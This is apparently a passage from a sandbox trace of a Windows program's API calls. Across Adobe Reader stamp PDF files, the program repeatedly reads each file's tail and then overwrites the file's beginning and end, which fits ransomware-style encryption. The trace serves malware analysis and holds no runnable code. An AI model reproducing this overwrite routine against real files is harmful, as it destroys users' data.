lpBuffer=0x1e92648*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0062.365] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0062.366] WriteFile (in: hFile=0x1ac, lpBuffer=0x2695be8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesWritten=0x2e9f28c*=0x4000, lpOverlapped=0x0) returned 1 [0062.366] CloseHandle (hObject=0x1ac) returned 1 [0062.367] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ESP\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\esp\\dynamic.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ac [0062.368] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0062.368] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xcdd8 [0062.368] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0062.368] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0062.369] ReleaseMutex (hMutex=0x168) returned 1 [0062.369] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dynamic.pdf", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0062.369] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dynamic.pdf", cchWideChar=11, lpMultiByteStr=0x1f7356c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Dynamic.pdf", lpUsedDefaultChar=0x0) returned 11 [0062.369] ReadFile (in: hFile=0x1ac, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x2e9f278*=0x4000, lpOverlapped=0x0) returned 1 [0062.372] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0xbdd8 [0062.372] ReadFile (in: hFile=0x1ac, lpBuffer=0x1ec5568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ec5568*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0062.372] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0xbdd8 [0062.372] WriteFile (in: hFile=0x1ac, lpBuffer=0x1e92648*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e92648*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0062.373] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0062.373] WriteFile (in: hFile=0x1ac, lpBuffer=0x2695be8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesWritten=0x2e9f28c*=0x4000, lpOverlapped=0x0) returned 1 [0062.373] CloseHandle (hObject=0x1ac) returned 1 [0062.375] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\EUQ\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\euq\\standardbusiness.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ac [0062.375] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0062.375] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x9a88d [0062.375] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0062.375] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0062.376] ReleaseMutex (hMutex=0x168) returned 1 [0062.376] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardBusiness.pdf", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0062.376] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardBusiness.pdf", cchWideChar=20, lpMultiByteStr=0x1f88ba4, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StandardBusiness.pdf", lpUsedDefaultChar=0x0) returned 20 [0062.376] ReadFile (in: hFile=0x1ac, lpBuffer=0x1ea3958, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesRead=0x2e9f278*=0xf000, lpOverlapped=0x0) returned 1 [0062.379] ReadFile (in: hFile=0x1ac, lpBuffer=0x1ea3958, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0062.380] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x9988d [0062.380] ReadFile (in: hFile=0x1ac, lpBuffer=0x1ec5568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ec5568*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0062.383] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x9988d [0062.383] WriteFile (in: hFile=0x1ac, lpBuffer=0x1e92648*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e92648*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0062.384] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0062.384] WriteFile (in: hFile=0x1ac, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0062.384] WriteFile (in: hFile=0x1ac, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0062.384] CloseHandle (hObject=0x1ac) returned 1 [0062.397] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HRV\\Standard.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\hrv\\standard.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0062.699] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0062.699] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x1c4f5 [0062.699] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0062.699] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0062.699] ReleaseMutex (hMutex=0x168) returned 1 [0062.699] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Standard.pdf", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0062.699] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Standard.pdf", cchWideChar=12, lpMultiByteStr=0x1f7324c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Standard.pdf", lpUsedDefaultChar=0x0) returned 12 [0062.699] ReadFile (in: hFile=0x1e4, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x2e9f278*=0x4000, lpOverlapped=0x0) returned 1 [0062.715] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x1b4f5 [0062.715] ReadFile (in: hFile=0x1e4, lpBuffer=0x269dc48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x269dc48*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0062.742] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x1b4f5 [0062.742] WriteFile (in: hFile=0x1e4, lpBuffer=0x2666a38*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2666a38*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0062.743] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0062.743] WriteFile (in: hFile=0x1e4, lpBuffer=0x2666a38*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2666a38*, lpNumberOfBytesWritten=0x2e9f28c*=0x4000, lpOverlapped=0x0) returned 1 [0062.743] CloseHandle (hObject=0x1e4) returned 1 [0062.759] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ITA\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ita\\dynamic.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0062.760] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0062.760] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xca88 [0062.760] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0062.760] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0062.760] ReleaseMutex (hMutex=0x168) returned 1 [0062.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dynamic.pdf", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0062.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dynamic.pdf", cchWideChar=11, lpMultiByteStr=0x1f734ec, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Dynamic.pdf", lpUsedDefaultChar=0x0) returned 11 [0062.760] ReadFile (in: hFile=0x1e4, lpBuffer=0x2695be8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesRead=0x2e9f278*=0x4000, lpOverlapped=0x0) returned 1 [0062.769] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0xba88 [0062.769] ReadFile (in: hFile=0x1e4, lpBuffer=0x269ec78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x269ec78*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0062.778] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0xba88 [0062.778] WriteFile (in: hFile=0x1e4, lpBuffer=0x1e980a8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0062.779] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0062.779] WriteFile (in: hFile=0x1e4, lpBuffer=0x1e980a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesWritten=0x2e9f28c*=0x4000, lpOverlapped=0x0) returned 1 [0062.779] CloseHandle (hObject=0x1e4) returned 1 [0062.783] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\KOR\\Hanko.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\kor\\hanko.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0062.783] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0062.783] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xeac1 [0062.783] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0062.784] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0062.784] ReleaseMutex (hMutex=0x168) returned 1 [0062.784] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Hanko.pdf", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0062.784] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Hanko.pdf", cchWideChar=9, lpMultiByteStr=0x1f733cc, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Hanko.pdf", lpUsedDefaultChar=0x0) returned 9 [0062.784] ReadFile (in: hFile=0x1e4, lpBuffer=0x2695be8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesRead=0x2e9f278*=0x4000, lpOverlapped=0x0) returned 1 [0062.802] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0xdac1 [0062.803] ReadFile (in: hFile=0x1e4, lpBuffer=0x2666a38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2666a38*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0062.971] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0xdac1 [0062.971] WriteFile (in: hFile=0x1e4, lpBuffer=0x1ea3958*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0062.972] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0062.972] WriteFile (in: hFile=0x1e4, lpBuffer=0x1e980a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesWritten=0x2e9f28c*=0x4000, lpOverlapped=0x0) returned 1 [0062.973] CloseHandle (hObject=0x1e4) returned 1 [0063.930] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NOR\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\nor\\standardbusiness.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0063.931] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0063.931] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x17ff8 [0063.931] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0063.931] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0063.931] ReleaseMutex (hMutex=0x168) returned 1 [0063.931] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardBusiness.pdf", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0063.931] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardBusiness.pdf", cchWideChar=20, lpMultiByteStr=0x1f88d34, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StandardBusiness.pdf", lpUsedDefaultChar=0x0) returned 20 [0063.931] ReadFile (in: hFile=0x1e4, lpBuffer=0x2662a08, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesRead=0x2e9f278*=0x4000, lpOverlapped=0x0) returned 1 [0063.956] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x16ff8 [0063.956] ReadFile (in: hFile=0x1e4, lpBuffer=0x1ec5568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ec5568*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0063.968] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x16ff8 [0063.968] WriteFile (in: hFile=0x1e4, lpBuffer=0x269e4a8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x269e4a8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0063.969] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0063.969] WriteFile (in: hFile=0x1e4, lpBuffer=0x1e980a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesWritten=0x2e9f28c*=0x4000, lpOverlapped=0x0) returned 1 [0063.969] CloseHandle (hObject=0x1e4) returned 1 [0063.987] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\PTB\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ptb\\signhere.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0063.988] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0063.988] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x9c53 [0063.988] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0063.988] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0063.988] ReleaseMutex (hMutex=0x168) returned 1 [0063.988] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SignHere.pdf", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0063.988] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SignHere.pdf", cchWideChar=12, lpMultiByteStr=0x1f7358c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SignHere.pdf", lpUsedDefaultChar=0x0) returned 12 [0063.989] ReadFile (in: hFile=0x1e4, lpBuffer=0x1ea3958, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesRead=0x2e9f278*=0x4000, lpOverlapped=0x0) returned 1 [0064.242] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x8c53 [0064.242] ReadFile (in: hFile=0x1e4, lpBuffer=0x1ec1538, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ec1538*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0064.242] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x8c53 [0064.242] WriteFile (in: hFile=0x1e4, lpBuffer=0x1ec1538*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ec1538*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0064.243] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0064.243] WriteFile (in: hFile=0x1e4, lpBuffer=0x1e980a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesWritten=0x2e9f28c*=0x4000, lpOverlapped=0x0) returned 1 [0064.243] CloseHandle (hObject=0x1e4) returned 1 [0064.247] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUS\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\rus\\dynamic.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0064.248] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: 